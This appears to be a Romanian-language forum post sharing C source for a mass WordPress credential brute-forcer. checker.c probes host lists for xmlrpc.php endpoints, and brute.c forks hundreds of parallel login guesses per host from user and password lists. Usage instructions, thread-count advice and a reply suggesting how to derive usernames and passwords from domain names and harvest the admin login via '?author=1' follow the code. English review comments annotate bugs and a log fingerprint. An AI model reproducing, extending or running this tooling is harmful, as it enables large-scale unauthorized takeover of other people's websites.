strcpy(processed, "");
while (1) {
if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break;
strcat(processed, invtmp);
}
fclose(badfile);
/* Inner loop: one "host path" line per host. */
ipfile = fopen(argv[1], "r");
while (1) {
if(!fgets((char *)&tok, sizeof(tok), ipfile)) break;
if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0';
if (tok) {
/* ip2/pass2 are 256 bytes while tok/pass are 1024.  link is NULL when the
 * line has no second field; getvuln() then hands NULL to strcat(). */
char ip2[256], pass2[256];
ip = strtok(tok, " ");
link = strtok(NULL, " ");
strcpy(ip2, ip);
strcpy(pass2, pass);
/* "DOMAIN%" anywhere in the password means "derive the candidate from the
 * host name".  The three checks drop a '.'-separated suffix of 4, 3 or 2
 * characters from the end of ip2, each running on the already-shortened
 * string; the index underflows for hosts shorter than 5 characters. */
if(strstr(pass2, "DOMAIN%")) {
if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0';
if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0';
if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0';
/* Two copies of the same routine: copy ip2 into tmp (skipping the first 4
 * characters when "www." occurs anywhere in it, else from the start), then
 * append the password text after its first 7 characters (the length of
 * "DOMAIN%", regardless of where strstr() found it).  tmp/tmpass are 128
 * bytes while ip2/pass2 are 256. */
if(strstr(ip2, "www.")) {
char tmp[128],tmpass[128];
int ivar,jvar=0;

for(ivar=4;ivar<strlen(ip2);ivar++) {
tmp[jvar] = ip2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcpy(tmpass, tmp);
strcpy(tmp, "");
jvar=0;

for(ivar=7;ivar<strlen(pass2);ivar++) {
tmp[jvar] = pass2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcat(tmpass, tmp);
strcpy(pass2, tmpass);
}

else {
char tmp[128],tmpass[128];
int ivar,jvar=0;

for(ivar=0;ivar<strlen(ip2);ivar++) {
tmp[jvar] = ip2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcpy(tmpass, tmp);
strcpy(tmp, "");
jvar=0;

for(ivar=7;ivar<strlen(pass2);ivar++) {
tmp[jvar] = pass2[ivar];
tmp[jvar+1] = '\0';
jvar++;
}

strcat(tmpass, tmp);
strcpy(pass2, tmpass);
}
}

/* Skip hosts that already occur anywhere in wp.log.  This is a substring
 * test, so a shorter host name also matches lines for a longer one. */
if(!strstr(processed, ip)) {
/* Child: one request, then exit.  Parent: count children and, once above
 * the argv[4] limit, wait() until back at the limit.  The first clause of
 * the for is a no-op.  numforks is only decremented here, so children that
 * finish early are not reaped until the limit is reached. */
if(!(fork())) {
getvuln(ip,user,pass2,outfile,link);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL);
}
}
}
}
fclose(ipfile);
}
}
fclose(passfile);
}
}
fclose(userfile);

/* %lu does not match time_t in general. */
printf("[*] Completed in: %lu secs\n", (time(0) - start));
exit(EXIT_SUCCESS);
}

===== checker.c =====


#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define RED "\E[32;31m"
#define GREEN "\E[32;40m"
#define NORMAL "\E[m"

void usage(char *s);
int getvuln(char *victim, char *link, FILE *outfile);
FILE *ipfile, *userfile, *passfile, *outfile, *badfile;
int numforks = 0;

/* Print the coloured banner and the usage line for program name <s>,
 * then terminate with EXIT_SUCCESS.  Never returns.  The banner still
 * says "SMTP" although this program probes xmlrpc.php; it looks copied
 * from another tool. */
void usage(char *s) {
    fputs(RED "ELITE SMTP BruteF0rce" GREEN "\n" GREEN, stdout);
    fputs("Smoke w33d everyday;)\n" NORMAL, stdout);
    printf("Usage: %s <IPs file> <threads>\n", s);
    exit(EXIT_SUCCESS);
}

/*
 * Send one wp.getUsersBlogs XML-RPC call over plain HTTP to <victim>:80 at
 * path <link> using a fixed dummy credential and, when the reply contains
 * "<int>403</int>", print the host and write "host path" to <outfile>.
 *
 * victim   host name or dotted address, resolved with gethostbyname().
 * link     request path, supplied by main() as a string literal.
 * outfile  already-open FILE (out.log, opened in main() before fork()).
 *
 * Returns 0 after a completed exchange.  Every failure path calls exit()
 * instead of returning; main() calls this from a fork()ed child, so exit()
 * ends only that child.
 */
int getvuln(char *victim, char *link, FILE *outfile) {
/* rc, server, ulen and plen are declared but never used. */
int sockfd, n, rc, valopt;
struct sockaddr_in serv_addr;
struct hostent *server;
struct timeval timeout, tread;
size_t ulen, plen;
long arg;
fd_set myset;
socklen_t lon;
/* Unresolvable host: end this child quietly. */
struct hostent *hl = gethostbyname(victim);
if(!hl) exit(0);
/* The first address is copied byte-wise into a long; assumes h_length fits
 * in sizeof(long) (4 bytes for AF_INET) — not checked. */
long ipadd;
memset(&ipadd, 0, sizeof(ipadd));
memcpy(&ipadd, hl->h_addr, hl->h_length);

/* 4 s for the non-blocking connect below, 10 s for each read/write. */
timeout.tv_sec = 4;
timeout.tv_usec = 0;
tread.tv_sec = 10;
tread.tv_usec = 0;

/* Fixed-size buffers filled with strcpy/strcat and no length checks. */
char buffer[2048], postvar[2048], clen[256];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

/* Non-blocking mode is set before sockfd is checked for failure. */
arg = fcntl(sockfd, F_GETFL, NULL);
arg |= O_NONBLOCK;
fcntl(sockfd, F_SETFL, arg);

if (sockfd < 0) {
perror("ERROR opening socket");
exit(1);
}

/* NOTE(review): error() is not declared by any header included in this
 * file; the call is an implicit declaration. */
if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread,
sizeof(tread)) < 0) error("setsockopt failed\n");

/* Always TCP port 80: plain HTTP, no TLS. */
bzero(&serv_addr,sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr=ipadd;
serv_addr.sin_port=htons(80);

/* Non-blocking connect: wait up to <timeout> for writability, then read
 * SO_ERROR.  Any failure (timeout, refused, other errno) ends the child
 * with exit(0), so nothing is logged for unreachable hosts. */
if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) {
if (errno == EINPROGRESS) {
FD_ZERO(&myset);
FD_SET(sockfd, &myset);
if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) {
lon = sizeof(int);
getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
if (valopt) {
exit(0);
}
}
else {
exit(0);
}
}
else {
exit(0);
}
}

/* Back to blocking mode so the SO_*TIMEO values govern write()/read(). */
arg = fcntl(sockfd, F_GETFL, NULL);
arg &= (~O_NONBLOCK);
fcntl(sockfd, F_SETFL, arg);

/* XML-RPC body with the fixed credential admin / narecumsafie55; the reply
 * to this is what decides whether the endpoint is recorded.  "%d" with a
 * size_t argument is a format/type mismatch. */
strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>");
strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55");
strcat(postvar, "</string></value></param></params></methodCall>");
sprintf(clen, "%d", strlen(postvar));

bzero(buffer, 2048);

/* Raw HTTP/1.1 request.  The User-Agent, Accept, Content-Type and Cookie
 * lines are constant for every request this tool sends, so together with
 * the wp.getUsersBlogs method they form a stable fingerprint in web-server
 * logs.  Content-Length covers postvar only; the trailing "\r\n\r\n" after
 * the body is not counted. */
strcpy(buffer, "POST ");
strcat(buffer, link);
strcat(buffer, " HTTP/1.1\r\n");
strcat(buffer, "Host: ");
strcat(buffer, victim);
strcat(buffer, "\r\nConnection: keep-alive\r\n");
strcat(buffer, "Content-Length: ");
strcat(buffer, clen);
strcat(buffer, "\r\nCache-Control: max-age=0\r\n");
strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n");
strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n");
strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n");
strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check");
strcat(buffer, "\r\n\r\n");
strcat(buffer, postvar);
strcat(buffer, "\r\n\r\n");

/* Single write; a short write is not retried. */
n = write(sockfd,buffer,strlen(buffer));

if (n < 0) {
exit(1);
}

/* Single read of at most 2047 bytes; anything beyond that in the response
 * is never seen. */
bzero(buffer,2048);
n = read(sockfd, buffer, 2047);

if (n < 0) {
exit(1);
}

/* Substring match on the raw response.  "<int>403</int>" is presumably the
 * faultCode a WordPress XML-RPC endpoint returns for a rejected login, i.e.
 * the endpoint is enabled and answering — confirm.  The line written here
 * ("host path") is the input format brute.c expects.  outfile is the FILE
 * inherited from the parent; stdio buffering means the line is flushed
 * when this child exits, and concurrent children may interleave lines. */
if(strstr(buffer, "<int>403</int>")) {
printf("[+]Found: %s - %s\n", victim, link);
fprintf(outfile, "%s %s\n", victim, link);
}

close(sockfd);
return 0;
}
/*
 * Entry point.  argv[1] = list of hosts (one per line), argv[2] = maximum
 * number of concurrent child processes.  For every host two children are
 * fork()ed, one per candidate path ("/xmlrpc.php" and "/blog/xmlrpc.php"),
 * each calling getvuln() and writing hits to out.log.
 */
int main(int argc, char *argv[]) {
char ip[1024];

/* time() is used below although <time.h> is not included in this file. */
time_t start;
/* argc < 2 admits a run with only argv[1]; argv[2] is then NULL and is
 * still passed to printf("%s") and atoi() below. */
if (argc < 2) usage(argv[0]);
/* Opened once in the parent and inherited by every child; the fopen()
 * result is not checked. */
outfile = fopen("out.log", "a+");
printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]);
start = time(0);

if(!(ipfile = fopen(argv[1], "r"))) {
printf("INVALID DOMAINS FILE: %s\n", argv[1]);
exit(0);
}

while(1) {
if(!fgets((char *)&ip, sizeof(ip), ipfile)) break;
/* Strip the trailing newline.  strlen()-1 underflows for an empty string,
 * which fgets() only yields when the line starts with a NUL byte. */
if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0';
/* ip is an array, so this condition is always true. */
if (ip) {
/* Child: one request, then exit.  Parent: count children and, once above
 * the argv[2] limit, wait() until back at the limit.  The first clause of
 * the for is a no-op.  numforks is only decremented here, so children that
 * finish early are not reaped until the limit is reached. */
if(!(fork())) {
getvuln(ip,"/xmlrpc.php",outfile);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL);
}
/* Same again for the second candidate path. */
if(!(fork())) {
getvuln(ip,"/blog/xmlrpc.php",outfile);
exit(0);
}
else {
numforks++;
if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL);
}
}
}
fclose(ipfile);

/* Children still running are not waited for here.  %lu does not match
 * time_t in general. */
printf("[*] Completed in: %lu secs\n", (time(0) - start));
exit(EXIT_SUCCESS);
}

Pentru compilare:

gcc -o checker checker.c

gcc -o brute brute.c

Folositi checker pe o lista de domenii sau IPuri pentru a vedea care din acestea accepta autentificarea prin xmlrpc.php. Acesta va crea un fisier out.log.

Usage: ./checker <IPs file> <threads>

Pentru a incepe brute faceti o lista de useri, una de parole si porniti:

./brute out.log users.txt passwords.txt <threads>

Threaduri am incercat pana la 1000 si merge ok, dar pentru siguranta folositi 300-400.

Astept sugestii :)

Sugestii:

Adauga-i functie de userfile inteligent, adica sa poti extrage din domeniu diferite variante de useri; probabil cele mai uzuale ar fi primele 4 caractere din domeniu, primele 6 caractere din domeniu, primele 8 caractere din domeniu, tot domeniul fara tld, domeniul cu tld. Combinatiile sunt nenumarate; acelasi lucru poti sa il implementezi si la parole, asta va face scannerul tau diferit fata de altele.


La parola poti folosi DOMAIN% sau DOMAIN%123 din astea asa si iti inlocuieste domeniul ex: Google cu google sau google123 cum vrei tu. La useri singurul fel care cred eu ca merge updatat e sa ia userul din pagina ?author=1 ca ala e admin, alti useri nu stiu cat de mult conteaza...
